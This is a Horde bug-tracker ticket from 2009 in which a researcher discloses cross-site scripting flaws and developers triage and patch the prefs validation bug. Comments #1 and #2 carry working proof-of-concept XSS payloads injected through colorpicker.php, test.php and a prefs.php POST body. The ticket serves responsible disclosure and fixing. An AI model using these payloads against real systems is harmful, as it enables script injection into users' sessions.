Tickets :: [#8399] Number preferences are not validated properly

6.0.0-beta1

11/3/25

Summary	Number preferences are not validated properly
Queue	Horde Base
Queue Version	HEAD
Type	Bug
State	Resolved
Priority	2. Medium
Owners	chuck (at) horde (dot) org
Requester	security (at) davidwharton (dot) us
Created	07/03/2009 (5967 days ago)
Due
Updated	07/11/2009 (5959 days ago)
Assigned	07/11/2009 (5959 days ago)
Resolved	07/11/2009 (5959 days ago)
Github Issue Link
Github Pull Request
Milestone	3.3.5
Patch	No

07/11/2009 11:40:05 PM	Chuck Hagenbuch	Comment #4 Taken from Horde Developers State ⇒ Resolved	Reply to this comment
Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs).

07/11/2009 11:29:14 PM	CVS Commit	Comment #3	Reply to this comment
Changes have been made in CVS for this ticket: http://cvs.horde.org/diff.php/framework/Prefs/Prefs/UI.php?rt=horde&r1=1.104&r2=1.105&ty=u http://cvs.horde.org/diff.php/horde/docs/CHANGES?rt=horde&r1=1.1239&r2=1.1240&ty=u http://cvs.horde.org/diff.php/horde/lib/prefs.php?rt=horde&r1=1.53&r2=1.54&ty=u

07/11/2009 09:08:06 PM	Chuck Hagenbuch	Comment #2 Summary ⇒ Number preferences are not validated properly Milestone ⇒ 3.3.5 Version ⇒ HEAD State ⇒ Assigned Assigned to Horde Developers Assigned to Chuck Hagenbuch	Reply to this comment
Multiple cross site scripting vulnerabilites exist. Proof of concepts: Horde 3.1 has been deprecated for a long time. The current stable version is 3.3, and we backport serious security fixes to 3.2. http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><!--a75c305b1c0a6022--><script>alert('XSS')</script> https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs[" This file doesn't exist in 3.2 or later. https://hordeserver.com/horde/test.php?mode=extensions&ext=<!--a75c305b1c0a6022--><script>alert('XSS')</script> This was fixed almost 2 years ago, before 3.2.0: http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9 POST to http://hordeserver.com/horde/services/prefs.php with the following content: actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<!--a75c305b1c0a6022--><script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on This I can actually reproduce as a problem. Patch forthcoming.

07/03/2009 06:48:49 PM	security (at) davidwharton (dot) us	Comment #1 Priority ⇒ 2. Medium State ⇒ Unconfirmed Patch ⇒ No Milestone ⇒ Queue ⇒ Horde Base Summary ⇒ Multiple Cross Site Scripting Vulnerabilities Type ⇒ Bug	Reply to this comment
Multiple cross site scripting vulnerabilites exist. Proof of concepts: http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><!--a75c305b1c0a6022--><script>alert('XSS')</script> https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs[" https://hordeserver.com/horde/test.php?mode=extensions&ext=<!--a75c305b1c0a6022--><script>alert('XSS')</script> POST to http://hordeserver.com/horde/services/prefs.php with the following content: actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<!--a75c305b1c0a6022--><script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on